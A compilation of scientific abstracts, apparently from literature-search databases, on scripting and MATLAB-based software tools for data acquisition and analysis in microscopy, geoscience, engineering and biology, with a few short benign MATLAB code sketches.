We present a scripting toolkit for the acquisition and analysis of a wide variety of imaging data by integrating the ease of use of various programming environments such as LABVIEW, IGOR PRO, MATLAB, SCILAB, and others. This toolkit is designed to allow the user to quickly program a variety of standard microscopy components for custom microscopy applications allowing much more flexibility than other packages. Included are both programming tools as well as graphical user interface classes allowing a standard, consistent, and easy to maintain scripting environment. This programming toolkit allows easy access to most commonly used cameras, stages, and shutters through the Micromanager project so the scripter can focus on their custom application instead of boilerplate code generation.
AutoMicromanager: a microscopy scripting toolkit for LABVIEW and other programming environments.
Ashcroft, Brian Alan; Oosterkamp, Tjerk
2010-11-01
We present a scripting toolkit for the acquisition and analysis of a wide variety of imaging data by integrating the ease of use of various programming environments such as LABVIEW, IGOR PRO, MATLAB, SCILAB, and others. This toolkit is designed to allow the user to quickly program a variety of standard microscopy components for custom microscopy applications allowing much more flexibility than other packages. Included are both programming tools as well as graphical user interface classes allowing a standard, consistent, and easy to maintain scripting environment. This programming toolkit allows easy access to most commonly used cameras, stages, and shutters through the Micromanager project so the scripter can focus on their custom application instead of boilerplate code generation.
The Generic Mapping Tools 6: Classic versus Modern Mode
NASA Astrophysics Data System (ADS)
Wessel, P.; Uieda, L.; Luis, J. M. F.; Scharroo, R.; Smith, W. H. F.; Wobbe, F.
2017-12-01
The Generic Mapping Tools (GMT; gmt.soest.hawaii.edu) is a 25-year old, mature open-source software package for the analysis and display of geoscience data (e.g., interpolate, filter, manipulate, project and plot temporal and spatial data). The GMT "toolbox" includes about 80 core and 40 supplemental modules sharing a common set of command options, file structures, and documentation. GMT5, when released in 2013, introduced an application programming interface (API) to allow programmatic access to GMT from other computing environments. Since then, we have released a GMT/MATLAB toolbox, an experimental GMT/Julia package, and will soon introduce a GMT/Python module. In developing these extensions, we wanted to simplify the GMT learning curve but quickly realized the main stumbling blocks to GMT command-line mastery would be ported to the external environments unless we introduced major changes. With thousands of GMT scripts already in use by scientists around the world, we were acutely aware of the need for backwards compatibility. Our solution, to be released as GMT 6, was to add a modern run mode that complements the classic mode offered so far. Modern mode completely eliminates the top three obstacles for new (and not so new) GMT users: (1) The responsibility to properly stack PostScript layers manually (i.e., the -O -K dance), (2) the responsibility of handling output redirection of PostScript (create versus append), and (3) the need to provide commands with repeated information about regions (-R) and projections (-J). Thus, modern mode results in shorter, simpler scripts with fewer pitfalls, without interfering with classic scripts. Our implementation adds five new commands that begin and end a modern session, simplify figure management, automate the conversion of PostScript to more suitable formats, automate region detection, and offer a new automated subplot environment for multi-panel illustrations. Here, we highlight the GMT modern mode and the simplifications it offers, both for command-line use and in external environments. GMT 6 is in beta mode but accessible from our repository. Numerous improvements have been added in addition to modern mode; we expect a formal release in early 2018. Publication partially supported by FCT project UID/GEO/50019/2013 - Instituto D. Luiz.
Automation of the CFD Process on Distributed Computing Systems
NASA Technical Reports Server (NTRS)
Tejnil, Ed; Gee, Ken; Rizk, Yehia M.
2000-01-01
A script system was developed to automate and streamline portions of the CFD process. The system was designed to facilitate the use of CFD flow solvers on supercomputer and workstation platforms within a parametric design event. Integrating solver pre- and postprocessing phases, the fully automated ADTT script system marshalled the required input data, submitted the jobs to available computational resources, and processed the resulting output data. A number of codes were incorporated into the script system, which itself was part of a larger integrated design environment software package. The IDE and scripts were used in a design event involving a wind tunnel test. This experience highlighted the need for efficient data and resource management in all parts of the CFD process. To facilitate the use of CFD methods to perform parametric design studies, the script system was developed using UNIX shell and Perl languages. The goal of the work was to minimize the user interaction required to generate the data necessary to fill a parametric design space. The scripts wrote out the required input files for the user-specified flow solver, transferred all necessary input files to the computational resource, submitted and tracked the jobs using the resource queuing structure, and retrieved and post-processed the resulting dataset. For computational resources that did not run queueing software, the script system established its own simple first-in-first-out queueing structure to manage the workload. A variety of flow solvers were incorporated in the script system, including INS2D, PMARC, TIGER and GASP. Adapting the script system to a new flow solver was made easier through the use of object-oriented programming methods. The script system was incorporated into an ADTT integrated design environment and evaluated as part of a wind tunnel experiment. The system successfully generated the data required to fill the desired parametric design space. This stressed the computational resources required to compute and store the information. The scripts were continually modified to improve the utilization of the computational resources and reduce the likelihood of data loss due to failures. An ad-hoc file server was created to manage the large amount of data being generated as part of the design event. Files were stored and retrieved as needed to create new jobs and analyze the results. Additional information is contained in the original.
Robichaud, Guillaume; Garrard, Kenneth P; Barry, Jeremy A; Muddiman, David C
2013-05-01
During the past decade, the field of mass spectrometry imaging (MSI) has greatly evolved, to a point where it has now been fully integrated by most vendors as an optional or dedicated platform that can be purchased with their instruments. However, the technology is not mature, and multiple research groups in both academia and industry are still very actively studying the fundamentals of imaging techniques, adapting the technology to new ionization sources, and developing new applications. As a result, there is an important variety of data file formats used to store mass spectrometry imaging data and, concurrent with the development of MSI, collaborative efforts have been undertaken to introduce common imaging data file formats. However, few free software packages to read and analyze files of these different formats are readily available. We introduce here MSiReader, a free open source application to read and analyze high resolution MSI data from the most common MSI data formats. The application is built on the Matlab platform (Mathworks, Natick, MA, USA) and includes a large selection of data analysis tools and features. People who are unfamiliar with the Matlab language will have little difficulty navigating the user-friendly interface, and users with Matlab programming experience can adapt and customize MSiReader for their own needs.
Extracting the Data From the LCM vk4 Formatted Output File
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wendelberger, James G.
These are slides about extracting the data from the LCM vk4 formatted output file. The following is covered: vk4 file produced by Keyence VK Software, custom analysis, no off-the-shelf way to read the file, reading the binary data in a vk4 file, various offsets in decimal lines, finding the height image data directly in MATLAB, binary output beginning of height image data, color image information, color image binary data, color image decimal and binary data, MATLAB code to read vk4 file (choose a file, read the file, compute offsets, read optical image, laser optical image, read and compute laser intensity image, read height image, timing, display height image, display laser intensity image, display RGB laser optical images, display RGB optical images, display beginning data and save images to workspace, gamma correction subroutine), reading intensity from the vk4 file, linear in the low range, linear in the high range, gamma correction for vk4 files, computing the gamma intensity correction, observations.
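The low-level reading pattern the slides describe can be sketched in a few lines of MATLAB; the byte offset, image dimensions, endianness, and file name below are placeholders rather than the actual vk4 layout documented in the slides.

    % Sketch: pull one height image out of a vk4 file with low-level binary I/O.
    fid = fopen('sample.vk4', 'r', 'ieee-le');          % assumed little-endian Keyence file
    heightOffset = 123456;                              % byte offset of the height block (placeholder)
    nRows = 768; nCols = 1024;                          % image dimensions (placeholders)
    fseek(fid, heightOffset, 'bof');
    h = fread(fid, [nCols, nRows], 'uint32=>double')';  % fread fills columns, so transpose
    fclose(fid);
    imagesc(h); axis image; colorbar; title('Height image')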
Quantum propagation and confinement in 1D systems using the transfer-matrix method
NASA Astrophysics Data System (ADS)
Pujol, Olivier; Carles, Robert; Pérez, José-Philippe
2014-05-01
The aim of this article is to provide some Matlab scripts to the teaching community in quantum physics. The scripts are based on the transfer-matrix formalism and offer a very efficient and versatile tool to solve problems of a physical object (electron, proton, neutron, etc.) with a one-dimensional (1D) stationary potential energy. Resonant tunnelling through multiple-barrier structures and confinement in wells of various shapes are particularly analysed. The results are quantitatively discussed with semiconductor heterostructures, harmonic and anharmonic molecular vibrations, or neutrons in a gravity field. Scripts and other examples (hydrogen-like ions and transmission by a smooth variation of potential energy) are available freely at http://www-loa.univ-lille1.fr/˜pujol in three languages: English, French and Spanish.
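A minimal, self-contained sketch of the formalism (not the authors' published scripts): transmission through a symmetric double barrier, in illustrative units with hbar = m = 1 and made-up barrier heights and positions.

    % Transfer-matrix sketch: transmission through a 1D double barrier (hbar = m = 1).
    V    = [0 5 0 5 0];              % potential in each region; outermost regions equal
    xint = [0 0.3 1.0 1.3];          % interface positions between consecutive regions
    E    = linspace(0.05, 10, 500);  % incident energies
    T    = zeros(size(E));
    for n = 1:numel(E)
        k = sqrt(2*(E(n) - V));      % wavenumbers; imaginary where E < V (evanescent)
        M = eye(2);
        for j = 1:numel(xint)        % chain the 2x2 interface matrices left to right
            k1 = k(j); k2 = k(j+1); x0 = xint(j); r = k1/k2;
            Mi = 0.5*[(1+r)*exp(1i*(k1-k2)*x0), (1-r)*exp(-1i*(k1+k2)*x0); ...
                      (1-r)*exp(1i*(k1+k2)*x0), (1+r)*exp(-1i*(k1-k2)*x0)];
            M  = Mi*M;
        end
        T(n) = 1/abs(M(2,2))^2;      % valid because the outermost potentials are equal
    end
    plot(E, T); xlabel('Energy (natural units)'); ylabel('Transmission')

The sharp peaks below the barrier height are the resonant-tunnelling levels of the well between the two barriers.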
Aerobraking Maneuver (ABM) Report Generator
NASA Technical Reports Server (NTRS)
Fisher, Forrest; Gladden, Roy; Khanampornpan, Teerapat
2008-01-01
abmREPORT Version 3.1 is a Perl script that extracts vital summarization information from the Mars Reconnaissance Orbiter (MRO) aerobraking ABM build process. This information facilitates sequence reviews and provides a high-level summarization of the sequence for mission management. The script extracts information from the ENV, SSF, FRF, SCMFmax, and OPTG files and from burn magnitude configuration files and presents it in a single, easy-to-check report that provides the majority of the parameters necessary for cross-check and verification during the sequence review process. This means that needed information, formerly spread across a number of different files, each in a different format, is all available in this one application. This program was built on the capabilities developed in dragReport, and the two scripts then evolved in parallel as both tools continued to be developed.
DSISoft—a MATLAB VSP data processing package
NASA Astrophysics Data System (ADS)
Beaty, K. S.; Perron, G.; Kay, I.; Adam, E.
2002-05-01
DSISoft is a public domain vertical seismic profile processing software package developed at the Geological Survey of Canada. DSISoft runs under MATLAB version 5.0 and above and hence is portable between computer operating systems supported by MATLAB (i.e. Unix, Windows, Macintosh, Linux). The package includes modules for reading and writing various standard seismic data formats, and for data editing, sorting, filtering, and other basic processing tasks. The processing sequence can be scripted, allowing batch processing and easy documentation. A structured format has been developed to ensure future additions to the package are compatible with existing modules. Interactive modules have been created using MATLAB's graphical user interface builder for displaying seismic data, picking first break times, examining frequency spectra, doing f-k filtering, and plotting the trace header information. DSISoft's modular design facilitates the incorporation of new processing algorithms as they are developed. This paper gives an overview of the scope of the software and serves as a guide for the addition of new modules.
USDA-ARS?s Scientific Manuscript database
A rapid computer-aided program for profiling glucosinolates, “GLS-Finder", was developed. GLS-Finder is a Matlab-script-based expert system that is capable of qualitative and semi-quantitative analysis of glucosinolates in samples using data generated by ultra-high performance liquid chromatograph...
RivGen, Igiugig Deployment, Control System Specifications and Models
Forbush, Dominic; Cavagnaro, Robert J.; Guerra, Maricarmen; Donegan, James; McEntee, Jarlath; Thomson, Jim; Polagye, Brian; Fabien, Brian; Kilcher, Levi
2016-03-21
Control System simulation models, case studies, and processing codes for analyzing field data. Raw data files included from VFD and SCADA. MatLab and Simulink are required to open some data files and all model files.
A modeling paradigm for interdisciplinary water resources modeling: Simple Script Wrappers (SSW)
NASA Astrophysics Data System (ADS)
Steward, David R.; Bulatewicz, Tom; Aistrup, Joseph A.; Andresen, Daniel; Bernard, Eric A.; Kulcsar, Laszlo; Peterson, Jeffrey M.; Staggenborg, Scott A.; Welch, Stephen M.
2014-05-01
Holistic understanding of a water resources system requires tools capable of model integration. This team has developed an adaptation of the OpenMI (Open Modelling Interface) that allows easy interactions across the data passed between models. Capabilities have been developed to allow programs written in common languages such as matlab, python and scilab to share their data with other programs and accept other programs' data. We call this interface the Simple Script Wrapper (SSW). An implementation of SSW is shown that integrates groundwater, economic, and agricultural models in the High Plains region of Kansas. Output from these models illustrates the interdisciplinary discovery facilitated through use of SSW-implemented models. Reference: Bulatewicz, T., A. Allen, J.M. Peterson, S. Staggenborg, S.M. Welch, and D.R. Steward, The Simple Script Wrapper for OpenMI: Enabling interdisciplinary modeling studies, Environmental Modelling & Software, 39, 283-294, 2013. http://dx.doi.org/10.1016/j.envsoft.2012.07.006 http://code.google.com/p/simple-script-wrapper/
NASA Technical Reports Server (NTRS)
Soileau, Kerry M.; Baicy, John W.
2008-01-01
Rig Diagnostic Tools is a suite of applications designed to allow an operator to monitor the status and health of complex networked systems using a unique interface between Java applications and UNIX scripts. The suite consists of Java applications, C scripts, VxWorks applications, UNIX utilities, C programs, and configuration files. The UNIX scripts retrieve data from the system and write them to a certain set of files. The Java side monitors these files and presents the data in user-friendly formats for operators to use in making troubleshooting decisions. This design allows for rapid prototyping and expansion of higher-level displays without affecting the basic data-gathering applications. The suite is designed to be extensible, with the ability to add new system components in building block fashion without affecting existing system applications. This allows for monitoring of complex systems for which unplanned shutdown time comes at a prohibitive cost.
JavaScript: Convenient Interactivity for the Class Web Page.
ERIC Educational Resources Information Center
Gray, Patricia
This paper shows how JavaScript can be used within HTML pages to add interactive review sessions and quizzes incorporating graphics and sound files. JavaScript has the advantage of providing basic interactive functions without the use of separate software applications and players. Because it can be part of a standard HTML page, it is…
Messier, Erik
2016-08-01
A Multichannel Systems (MCS) microelectrode array data acquisition (DAQ) unit is used to collect multichannel electrograms (EGM) from a Langendorff perfused rabbit heart system to study sudden cardiac death (SCD). MCS provides software through which data being processed by the DAQ unit can be displayed and saved, but this software's utility in combination with MATLAB is limited. MCS's software stores recorded EGM data in a MathCad (MCD) format, which is then converted to a text file format. These text files are very large, and it is therefore very time consuming to import the EGM data into MATLAB for real-time analysis. Therefore, customized MATLAB software was developed to control the acquisition of data from the MCS DAQ unit and provide specific laboratory accommodations for this study of SCD. The developed DAQ unit control software will be able to accurately provide real-time display of EGM signals; record and save EGM signals in MATLAB in a desired format; and produce real-time analysis of the EGM signals; all through an intuitive GUI.
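A hedged sketch of the slow text-import path the abstract describes, pulling a large tab-delimited EGM export into MATLAB once and caching it as a .mat file; the file name and column layout are assumptions, not the MCS export format.

    % Import a multichannel EGM text export and cache it for later sessions.
    egm = readmatrix('egm_export.txt');   % requires R2019a+; dlmread works on older releases
    t   = egm(:,1);                       % assumed: time stamps in column 1 [s]
    ch  = egm(:,2:end);                   % assumed: one column per electrode
    fs  = 1/median(diff(t));              % estimated sampling rate [Hz]
    plot(t, ch(:,1)); xlabel('Time (s)'); ylabel('Amplitude')
    save('egm_export.mat', 't', 'ch', 'fs', '-v7.3');   % skip the slow text parse next time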
Documenting AUTOGEN and APGEN Model Files
NASA Technical Reports Server (NTRS)
Gladden, Roy E.; Khanampompan, Teerapat; Fisher, Forest W.; DelGuericio, Chris C.
2008-01-01
A computer program called "autogen hypertext map generator" satisfies a need for documenting and assisting in visualization of, and navigation through, model files used in the AUTOGEN and APGEN software mentioned in the two immediately preceding articles. This program parses autogen script files, autogen model files, PERL scripts, and apgen activity-definition files and produces a hypertext map of the files to aid in the navigation of the model. This program also provides a facility for adding notes and descriptions, beyond what is in the source model represented by the hypertext map. Further, this program provides access to a summary of the model through variable, function, subroutine, activity and resource declarations, as well as providing full access to the source model and source code. The use of the tool enables easy access to the declarations and the ability to traverse routines and calls while analyzing the model.
2018-01-18
processing. Specifically, the method described herein uses wgrib2 commands along with a Python script or program to produce tabular text files that in... It makes use of software that is readily available and can be implemented on many computer systems combined with relatively modest additional... example), extracts appropriate information, and lists the extracted information in a readable tabular form. The Python script used here is described in...
Fundamentals of Structural Geology
NASA Astrophysics Data System (ADS)
Pollard, David D.; Fletcher, Raymond C.
2005-09-01
Fundamentals of Structural Geology provides a new framework for the investigation of geological structures by integrating field mapping and mechanical analysis. Assuming a basic knowledge of physical geology, introductory calculus and physics, it emphasizes the observational data, modern mapping technology, principles of continuum mechanics, and the mathematical and computational skills necessary to quantitatively map, describe, model, and explain deformation in Earth's lithosphere. By starting from the fundamental conservation laws of mass and momentum, the constitutive laws of material behavior, and the kinematic relationships for strain and rate of deformation, the authors demonstrate the relevance of solid and fluid mechanics to structural geology. This book offers a modern quantitative approach to structural geology for advanced students and researchers in structural geology and tectonics. It is supported by a website hosting images from the book, additional colour images, student exercises and MATLAB scripts. Solutions to the exercises are available to instructors. The book integrates field mapping using modern technology with the analysis of structures based on a complete mechanics. MATLAB is used to visualize physical fields and analytical results, and MATLAB scripts can be downloaded from the website to recreate textbook graphics and enable students to explore their choice of parameters and boundary conditions. The supplementary website hosts color images of outcrop photographs used in the text, supplementary color images, and images of textbook figures for classroom presentations. The textbook website also includes student exercises designed to instill the fundamental relationships and to encourage the visualization of the evolution of geological structures; solutions are available to instructors.
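As a flavor of the kind of MATLAB visualization the book's scripts support (a generic example written for this summary, not one of the textbook's own downloads), a scalar field and its gradient can be plotted with meshgrid, contourf, and quiver:

    % Visualize a scalar field (standing in for, e.g., a stress function) and its gradient.
    [x, y] = meshgrid(linspace(-2, 2, 101));
    phi = exp(-(x.^2 + y.^2));                      % illustrative field
    [gx, gy] = gradient(phi, x(1,2) - x(1,1));      % numerical gradient on the grid
    contourf(x, y, phi, 20, 'LineStyle', 'none'); hold on
    s = 1:5:101;                                    % subsample the arrows for readability
    quiver(x(s,s), y(s,s), gx(s,s), gy(s,s), 'k');
    axis equal tight; colorbar; xlabel('x'); ylabel('y')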
Batch Proving and Proof Scripting in PVS
NASA Technical Reports Server (NTRS)
Munoz, Cesar A.
2007-01-01
The batch execution modes of PVS are powerful, but highly technical, features of the system that are mostly accessible to expert users. This paper presents a PVS tool, called ProofLite, that extends the theorem prover interface with a batch proving utility and a proof scripting notation. ProofLite enables a semi-literate proving style where specification and proof scripts reside in the same file. The goal of ProofLite is to provide batch proving and proof scripting capabilities to regular, non-expert, users of PVS.
DOE Office of Scientific and Technical Information (OSTI.GOV)
McSpaden, Alexander Thomas
Two Python scripts have been written that process the output files of MCNP6 into a format that mimics the list-mode output of Los Alamos National Laboratory’s MC-15 and NPOD neutron detection systems. This report details the methods implemented in these scripts and instructions on their use.
Butensky, Samuel D; Sloan, Andrew P; Meyers, Eric; Carmel, Jason B
2017-07-15
Hand function is critical for independence, and neurological injury often impairs dexterity. To measure hand function in people or forelimb function in animals, sensors are employed to quantify manipulation. These sensors make assessment easier and more quantitative and allow automation of these tasks. While automated tasks improve objectivity and throughput, they also produce large amounts of data that can be burdensome to analyze. We created software called Dexterity that simplifies data analysis of automated reaching tasks. Dexterity is MATLAB software that enables quick analysis of data from forelimb tasks. Through a graphical user interface, files are loaded and data are identified and analyzed. These data can be annotated or graphed directly. Analysis is saved, and the graph and corresponding data can be exported. For additional analysis, Dexterity provides access to custom scripts created by other users. To determine the utility of Dexterity, we performed a study to evaluate the effects of task difficulty on the degree of impairment after injury. Dexterity analyzed two months of data and allowed new users to annotate the experiment, visualize results, and save and export data easily. Previously, analysis of these tasks required custom data analysis and expertise with analysis software. Dexterity made the tools required to analyze, visualize and annotate data easy to use by investigators without data science experience. Dexterity increases accessibility to automated tasks that measure dexterity by making analysis of large data sets intuitive, robust, and efficient. Copyright © 2017 Elsevier B.V. All rights reserved.
Developing defensive aids suite technology on a virtual battlefield
NASA Astrophysics Data System (ADS)
Rapanotti, John L.; DeMontigny-Leboeuf, Annie; Palmarini, Marc; Cantin, Andre
2002-07-01
Modern anti-tank missiles and the requirement of rapid deployment are limiting the use of passive armour in protecting land vehicles. Vehicle survivability is becoming more dependent on sensors, computers and countermeasures to detect and avoid threats. The integration of various technologies into a Defensive Aids Suite (DAS) can be designed and analyzed by combining field trials and laboratory data with modeling and simulation. MATLAB is used as a quick prototyping tool to model DAS systems and facilitate transfer to other researchers. The DAS model can be transferred from MATLAB or programmed directly in ModSAF (Modular Semi-Automated Forces), which is used to construct the virtual battlefield. Through scripted input files, a fixed-battle approach ensures that implementation and analysis meet the requirements of three different communities: scientists and engineers, the military, and operations research. This approach ensures the modelling of processes known to be important regardless of the level of information available about the system. A system can be modelled phenomenologically until more information is available. Further processing of the simulation can be used to optimize the vehicle for a specific mission. ModSAF will be used to analyze and plan trials and develop DAS technology for future vehicles. Survivability of a DAS-equipped vehicle can be assessed relative to a basic vehicle without a DAS. In later stages, more complete DAS systems will be analyzed to determine the optimum configuration of the DAS components and the effectiveness of a DAS-equipped vehicle for specific missions. These concepts and approach will be discussed in the paper.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Marsh, Amber; Harsch, Tim; Pitt, Julie
2007-08-31
The computer side of the IMAGE project consists of a collection of Perl scripts that perform a variety of tasks; scripts are available to insert, update and delete data from the underlying Oracle database, download data from NCBI's Genbank and other sources, and generate data files for download by interested parties. Web scripts make up the tracking interface, and various tools available on the project web-site (image.llnl.gov) that provide a search interface to the database.
Software for Managing Parametric Studies
NASA Technical Reports Server (NTRS)
Yarrow, Maurice; McCann, Karen M.; DeVivo, Adrian
2003-01-01
The Information Power Grid Virtual Laboratory (ILab) is a Practical Extraction and Reporting Language (PERL) graphical-user-interface computer program that generates shell scripts to facilitate parametric studies performed on the Grid. (The Grid denotes a worldwide network of supercomputers used for scientific and engineering computations involving data sets too large to fit on desktop computers.) Heretofore, parametric studies on the Grid have been impeded by the need to create control-language scripts and edit input data files, painstaking tasks that are necessary for managing multiple jobs on multiple computers. ILab reflects an object-oriented approach to automation of these tasks: all data and operations are organized into packages in order to accelerate development and debugging. A container or document object in ILab, called an experiment, contains all the information (data and file paths) necessary to define a complex series of repeated, sequenced, and/or branching processes. For convenience and to enable reuse, this object is serialized to and from disk storage. At run time, the current ILab experiment is used to generate required input files and shell scripts, create directories, copy data files, and then both initiate and monitor the execution of all computational processes.
CellSegm - a MATLAB toolbox for high-throughput 3D cell segmentation.
Hodneland, Erlend; Kögel, Tanja; Frei, Dominik Michael; Gerdes, Hans-Hermann; Lundervold, Arvid
2013-08-09
The application of fluorescence microscopy in cell biology often generates a huge amount of imaging data. Automated whole cell segmentation of such data enables the detection and analysis of individual cells, where a manual delineation is often time consuming, or practically not feasible. Furthermore, compared to manual analysis, automation normally has a higher degree of reproducibility. CellSegm, the software presented in this work, is a Matlab based command line software toolbox providing an automated whole cell segmentation of images showing surface stained cells, acquired by fluorescence microscopy. It has options for both fully automated and semi-automated cell segmentation. Major algorithmic steps are: (i) smoothing, (ii) Hessian-based ridge enhancement, (iii) marker-controlled watershed segmentation, and (iv) feature-based classification of cell candidates. Using a wide selection of image recordings and code snippets, we demonstrate that CellSegm has the ability to detect various types of surface stained cells in 3D. After detection and outlining of individual cells, the cell candidates can be subject to software based analysis, specified and programmed by the end-user, or they can be analyzed by other software tools. A segmentation of tissue samples with appropriate characteristics is also shown to be resolvable in CellSegm. The command-line interface of CellSegm facilitates scripting of the separate tools, all implemented in Matlab, offering a high degree of flexibility and tailored workflows for the end-user. The modularity and scripting capabilities of CellSegm enable automated workflows and quantitative analysis of microscopic data, suited for high-throughput image based screening.
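Steps (i)-(iii) can be roughed out with plain Image Processing Toolbox calls; the sketch below is a generic marker-controlled watershed for illustration, not CellSegm's own API, and the file name and threshold are placeholders.

    % Generic smoothing + marker-controlled watershed on a (grayscale) surface-stain image.
    I   = im2double(imread('cells.png'));       % placeholder file name
    Is  = imgaussfilt(I, 2);                    % (i) smoothing
    [gmag, ~] = imgradient(Is);                 % edge strength, standing in for (ii)
    markers = imextendedmin(Is, 0.05);          % seed markers in dark cell interiors (guess)
    gmod = imimposemin(gmag, markers);          % force regional minima at the markers
    L = watershed(gmod);                        % (iii) marker-controlled watershed
    imshow(label2rgb(L, 'jet', 'w', 'shuffle')) % candidate regions for (iv) classification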
Vali, Faisal S; Hsi, Alex; Cho, Paul; Parsai, Homayon; Garver, Elizabeth; Garza, Richard
2008-11-06
The Calypso 4D Localization System records prostate motion continuously during radiation treatment. It stores the data across thousands of Excel files. We developed Javascript (JScript) libraries for Windows Script Host (WSH) that use ActiveX Data Objects, OLE Automation and SQL to statistically analyze the data and display the results as a comprehensible Excel table. We then leveraged these libraries in other research to perform vector math on data spread across multiple access databases.
Data files from the Grays Harbor Sediment Transport Experiment Spring 2001
Landerman, Laura A.; Sherwood, Christopher R.; Gelfenbaum, Guy; Lacy, Jessica; Ruggiero, Peter; Wilson, Douglas; Chisholm, Tom; Kurrus, Keith
2005-01-01
This publication consists of two DVD-ROMs, both of which are presented here. This report describes data collected during the Spring 2001 Grays Harbor Sediment Transport Experiment, and provides additional information needed to interpret the data. Two DVDs accompany this report; both contain documentation in html format that assists the user in navigating through the data. DVD-ROM-1 contains a digital version of this report in .pdf format, raw Aquatec acoustic backscatter (ABS) data in .zip format, Sonar data files in .avi format, and coastal processes and morphology data in ASCII format. ASCII data files are provided in .zip format; bundled coastal processes ASCII files are separated by deployment and instrument; bundled morphology ASCII files are separated into monthly data collection efforts containing the beach profiles collected (or extracted from the surface map) at that time; weekly surface maps are also bundled together. DVD-ROM-2 contains a digital version of this report in .pdf format, the binary data files collected by the SonTek instrumentation, calibration files for the pressure sensors, and Matlab m-files for loading the ABS data into Matlab and cleaning up the optical backscatter (OBS) burst time-series data.
2014-09-05
shell script that checks Java code and prints out an alphabetical list of unrecognized spellings. It properly handles namesWithEmbeddedCapitalization... local/bin/ispell. To run this script, type $PTII/util/testsuite/ptspell *.java • testsuite/chkjava is a shell script for checking various other... best if the svn:native property is set. Below is how to check the values for a file named README.txt: bash-3.2$ svn proplist README.txt Properties on
Dibblee, T. W.; Digital database compiled by Graham, S. E.; Mahony, T.M.; Blissenbach, J.L.; Mariant, J.J.; Wentworth, C.M.
1999-01-01
This Open-File Report is a digital geologic map database. The report serves to introduce and describe the digital data. There is no paper map included in the Open-File Report. The report includes PostScript and PDF plot files that can be used to plot images of the geologic map sheet and explanation sheet. This digital map database is prepared from a previously published map by Dibblee (1973). The geologic map database delineates map units that are identified by general age, lithology, and clast size following the stratigraphic nomenclature of the U.S. Geological Survey. For descriptions of the units, their stratigraphic relations, and sources of geologic mapping, consult the explanation sheet (of99-14_4b.ps or of99-14_4d.pdf), or the original published paper map (Dibblee, 1973). The scale of the source map limits the spatial resolution (scale) of the database to 1:125,000 or smaller. For those interested in the geology of Carrizo Plain and vicinity who do not use an ARC/INFO compatible Geographic Information System (GIS), but would like to obtain a paper map and explanation, PDF and PostScript plot files containing map images of the data in the digital database, as well as PostScript and PDF plot files of the explanation sheet and explanatory text, have been included in the database package (please see the section 'Digital Plot Files', page 5). The PostScript plot files require a gzip utility to access them. For those without computer capability, we can provide users with the PostScript or PDF files on tape that can be taken to a vendor for plotting. Paper plots can also be ordered directly from the USGS (please see the section 'Obtaining Plots from USGS Open-File Services', page 5). The content and character of the database, methods of obtaining it, and processes of extracting the map database from the tar (tape archive) file are described herein. The map database itself, consisting of six ARC/INFO coverages, can be obtained over the Internet or by magnetic tape copy as described below. The database was compiled using ARC/INFO, a commercial Geographic Information System (Environmental Systems Research Institute, Redlands, California), with version 3.0 of the menu interface ALACARTE (Fitzgibbon and Wentworth, 1991, Fitzgibbon, 1991, Wentworth and Fitzgibbon, 1991). The ARC/INFO coverages are stored in uncompressed ARC export format (ARC/INFO version 7.x). All data files have been compressed, and may be uncompressed with gzip, which is available free of charge over the Internet via links from the USGS Public Domain Software page (http://edcwww.cr.usgs.gov/doc/edchome/ndcdb/public.html). ARC/INFO export files (files with the .e00 extension) can be converted into ARC/INFO coverages in ARC/INFO (see below) and can be read by some other Geographic Information Systems, such as MapInfo via ArcLink and ESRI's ArcView.
Automated Quantification of Gradient Defined Features
2008-09-01
defined features in submarine environments. The technique utilizes MATLAB scripts to convert bathymetry data into a gradient dataset, produce gradient... maps, and most importantly, automate the process of defining and characterizing gradient defined features such as flows, faults, landslide scarps, folds... convergent plate margin hosts a series of large serpentinite mud volcanoes (Fig. 1). One of the largest of these active mud volcanoes is Big Blue
Zhou, Yangzhong; Cattley, Richard T; Cario, Clinton L; Bai, Qing; Burton, Edward A
2014-07-01
This article describes a method to quantify the movements of larval zebrafish in multiwell plates, using the open-source MATLAB applications LSRtrack and LSRanalyze. The protocol comprises four stages: generation of high-quality, flatly illuminated video recordings with exposure settings that facilitate object recognition; analysis of the resulting recordings using tools provided in LSRtrack to optimize tracking accuracy and motion detection; analysis of tracking data using LSRanalyze or custom MATLAB scripts; and implementation of validation controls. The method is reliable, automated and flexible, requires <1 h of hands-on work for completion once optimized and shows excellent signal:noise characteristics. The resulting data can be analyzed to determine the following: positional preference; displacement, velocity and acceleration; and duration and frequency of movement events and rest periods. This approach is widely applicable to the analysis of spontaneous or stimulus-evoked zebrafish larval neurobehavioral phenotypes resulting from a broad array of genetic and environmental manipulations, in a multiwell plate format suitable for high-throughput applications.
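The displacement/velocity/acceleration step can be pictured on exported centroid tracks as follows; the variable names, frame rate, and movement threshold are illustrative and do not reflect LSRanalyze's actual output format.

    % Kinematics from per-frame centroid positions x, y (column vectors, mm).
    fps = 30;                                   % assumed camera frame rate
    dt  = 1/fps;
    displacement = hypot(diff(x), diff(y));     % per-frame path increment [mm]
    velocity     = displacement / dt;           % [mm/s]
    acceleration = diff(velocity) / dt;         % [mm/s^2]
    isMoving  = velocity > 0.5;                 % movement events above a chosen threshold
    boutCount = sum(diff([0; double(isMoving)]) == 1);   % number of distinct movement bouts
    fprintf('Total path %.1f mm in %d bouts\n', sum(displacement), boutCount);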
Wind Tunnel Simulations of the Mock Urban Setting Test - Experimental Procedures and Data Analysis
2004-07-01
depends on the subjective choice of points to include in the constant stress region. This is demonstrated by the marked difference in the slope for the two... designed explicitly for the analysis of time series and signal processing, particularly for atmospheric dispersion experiments. The scripts developed... below. Processing scripts are available for all these analyses in the /scripts directory. All files of figures and processed data resulting from these
Zimmermann, Patric; Green, Robert J; Haverkort, Maurits W; de Groot, Frank M F
2018-05-01
Some initial instructions for the Quanty4RIXS program written in MATLAB® are provided. The program assists in the calculation of 1s2p RIXS and 1s2p RIXS-MCD spectra using Quanty. Furthermore, 1s XAS and 2p3d RIXS calculations in different symmetries can also be performed. It includes the Hartree-Fock values for the Slater integrals and spin-orbit interactions for several 3d transition metal ions that are required to create the .lua scripts containing all necessary parameters and quantum mechanical definitions for the calculations. The program can be used free of charge and is designed to allow for further adjustments of the scripts. Open access.
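The .lua generation step can be pictured as simple formatted writing from MATLAB; the parameter names and values below are placeholders, not the Hartree-Fock values the program tabulates.

    % Write a small Quanty-style .lua parameter block from a MATLAB struct.
    p.Udd     = 6.0;                    % placeholder interaction parameter
    p.zeta_2p = 8.2;                    % placeholder spin-orbit parameter
    fid = fopen('rixs_input.lua', 'w');
    fprintf(fid, '-- auto-generated parameter block\n');
    fn = fieldnames(p);
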